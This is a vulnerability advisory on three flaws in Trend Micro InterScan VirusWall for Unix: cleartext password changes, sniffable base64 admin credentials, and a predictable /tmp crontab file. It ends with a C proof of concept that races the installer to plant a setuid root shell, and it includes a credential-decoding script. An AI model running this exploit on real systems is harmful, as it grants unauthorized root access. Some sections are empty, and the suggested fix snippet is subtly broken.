InterScan VirusWall - multiple vunerabilities
SUMMARY
Product: Interscan VirusWall for UNIX
Vendor: Trend Micro
Testing Platform: RedHat Linux 6.2
vunerable version: 3.0.1 & 3.6.x
non-vunerable versions: unknown
Vendor: Trend Micro
Issues: This advisory covers three separate issues
1) insecure password change mechanism - Password change
information is sent from the administrator's browser to the
setpasswd.cgi program in clear text.
2) weak authentication method allows password recovery - each
GET request contains the base64 encoded username:password pair
of the administrator. This can easily be converted to plain text.
3) predictable files names for root-owned temporary files -
Installation or removal of this InterScan VirusWall can allow
local users to become root.
Impact: Issues 1 & 2 could allow unauthorized individuals to learn
the password for the 'admin' account on this box. Using this
password, they could disable virus scanning, change the types
of files that are scanned, or alter the response the machine
makes to files containing viruses. Issue 3 could provide an
attacker with a priviledged account they might use to attack
other machines within a network.
Fixes: On Dec. 29 a Trend Micro representative informed me that no
patches will be released, but the new version of ISVW (estimated
release late Feb. or early Mar.) will contain fixes for these
vunerabilities.
Work-arounds: Only install ISVW on a stand-alone box. Don't use
the browser-based configuration tools remotely unless you
are confident that your network is not being sniffed.
Contact History: Trend Micro was contacted three times (once per
vunerability) December 26-27. They've assigned these
three vunerabilities to CASE ID# TDSC-237EA95D
Researcher: Joey Maier <[email protected]>
===================================================================
BACKGROUND
Trend Micro's InterScanVirusWall (a.k.a. 'ISVW') is a product that
is designed to provide "Real-time virus detection and clean-up for all
SMTP, HTTP, and FTP Internet traffic at the gateway"
(see http://www.antivirus.com/products/isvw/ for details on this product)
Trend Micro has versions of ISVW for NT, Solaris, HP-UX and Linux. This
advisory only covers the Linux version. It is unknown if the NT, Solaris
and HP-UX versions of this product display the same behavior.
===================================================================
*** DETAILS - insecure password change mechanism***
Installation of the ISVW package on a RedHat linux 6.2 box places a web
server on port 1812. This web server runs a variety of CGIs that provide
web-based administration functionality. One of these is setpasswd.cgi,
which is used to change the administrative password for ISVW. As the
following snort log shows, the old and new passwords are sent in clear
text to setpasswd.cgi via a GET request.
*** METHODOLOGY - insecure password change mechanism***
*** DETAILS - weak authentication method***
ISVW's web-based administration uses CGIs that are passed information
via GET requests. Authorization to use specific CGIs is determined
via the typical low-security methodology of web browsers. This means
that Each GET request to the server contains the base-64 encoded
username and password. The base-64 encoded 'username:password'
pair in the example snort log shown below is "YWRtaW46YWRtaW4"
It is trivial to sniff GET requests destined for the ISVW server and
use a base64 decoder to learn the password of the ISVW administrator.
The following script is sufficient for decoding captured
authentication tokens.
#!/usr/bin/perl
use MIME::Base64 ();
$input=$ARGV[0];
$output = MIME::Base64::decode($input);
print "$input=$output\n";
*** METHODOLOGY - weak authentication method***
To confirm this vunerability, perform the following steps:
*** DETAILS - predictable file names***
The install script for 3.6.x uses /tmp/crontab.$$ for this, which is
only slightly better. If an attacker can create /tmp/istmp_cron (or
/tmp/crontab.$$) before 'isinst' can, they will retain write access
to the files throughout the installation, allowing them to append their
own cron jobs to the file before crontab is called. Obviously, having
the ability to control the contents of root's crontab gives an attacker
the ability to become root.
*** METHODOLOGY - predictable file names***
To confirm this vunerability, perform the following steps:
[see the end of this advisory for a source code example using the
/tmp/istmp_cron file created by ISVW 3.0.1]
===================================================================
HISTORY
Vendor contact and disclosure timelines were based upon the RFPolicyv2
(http://www.wiretrip.net/rfp/policy.html) Rain Forest Puppy uses.
Issues 1 & 3 were noticed on December 22 and 21, respectively, but
Trend Micro was not notified until after Christmas so that they would
not ask anyone to work over the holiday. Issue #2 was noticed on
December 26.
Two notifications - the first for issue #1, the second for issue #2 - were
sent to the following Trend Micro addresses on December 26:
[email protected], [email protected],
[email protected], [email protected],
[email protected], [email protected],
[email protected], [email protected]
The third notification was sent on December 27.
Trend Micro's response was prompt and curteous. By the evening of
December 27, they had acknowledged receiving all three of my emails.
On December 29 they informed me that these problems would be fixed in
their new version.
COMMENTS
I'm surprised at how common the misuse of predictable /tmp files
still is. Vendors who are using /tmp should consider using alternate
portions of the directory tree that are not world writable. At the
very least, they should utilize mktemp. To be safe, they also ought
to check the ownership and permissions of the temporary file before
using it for critical things like crontab. If a vendor wants to
use a temporary file for a security critical purpose like modifying
cron, they should consider doing something like the following:
# start by creating a safe directory to use throughout the
# entire installation script.
mkdir /root/tmp
[...]
# create a file with the current cron jobs
TMPFILE=`mktemp /root/tmp/$0.XXXXXX` || exit 1
crontab -l > $TMPFILE
# append two new cron jobs to the file
echo "0 * * * * /etc/iscan/prescan.cgi >/dev/null 2>&1" >> $TMPFILE
echo "30 2 * * * /etc/iscan/cleanscan >/dev/null 2>&1" >> $TMPFILE
# check to make sure noone has messed with the file
file=3D`find /tmp/ -type f -name $TMPFILE -user root -group wheel`
crontab $file 2>/dev/null || exit 1
rm $TMPFILE
I'm disappointed with Trend Micro's decision to release an updated
version of ISVW without releasing patches for the current versions.
Unless they heavily advertise changes made for the sake of security,
many customers will be unaware of these issues and may remain
vunerable. If a vendor chooses to stop releasing patches for a
product, they should inform their customers that they are no longer
supporting that product.
ACKNOWLEDGEMENTS
Thanks to the following individuals for providing feedback on this
advisory: Chris Horton, Dan Kaminsky, Kevin Hart, Walter Maier,
Irwin Dulan
Thanks to Jeff McElroy of http://www.Radux.com for the demonstration
program used to illustrate issue #3 to the vendor.
Thanks to the people and teams responsible for the following tools used
in this research:
OpenBSD: Theo de Raadt and many others (http://www.OpenBSD.org)
Perl's MIME::Base64 Module: Gisle Aas (http://gisle.aas.no/perl/)
(also at http://www.perl.com/CPAN-local/modules/by-module/MIME/)
RFPolicyV2: Rain Forest Puppy (http://www.wiretrip.net/rfp/policy.html)
Snort: Martin Roesch and many others (http://www.snort.org)
Watch-Temp: mudge (http://www.atstake.com/research/tools/l0pht-watch.tar.gz)
"Do not follow in the footsteps of wise men.
Instead, seek what they sought." -- Basho
#include <sys/stat.h>
#include <fcntl.h>
#define TMPFILE "/tmp/istmp_cron"
#define CRONTAB_ENTRY "* * * * * cp /bin/sh /tmp/rootshell; chmod 4755
/tmp/rootshell
"
int main(int argc, char *argv[])
{
int file;
off_t file_size;
struct stat file_stat;
int rc;
/*###########################################################
###########################################################*/
file=open(TMPFILE, O_RDWR|O_CREAT|O_APPEND, 0777);
if (file < 0) {
perror(TMPFILE);
return 1;
}
/*##################################################################
##################################################################/
rc =fstat(file, &file_stat);
file_size=file_stat.st_size;
while(1){
rc =fstat(file, &file_stat);
if(file_stat.st_size != file_size){
/######################
## append our cronjob ##
######################*/
rc = write(file, CRONTAB_ENTRY, sizeof(CRONTAB_ENTRY)
-1 );
close(file);
return 0;
}
}
}
–
"When you understand UNIX, you will understand the world.
When you understand NT…you will understand NT" - Richard Thieme
http://www.slothnet.com - is currently unavailable :(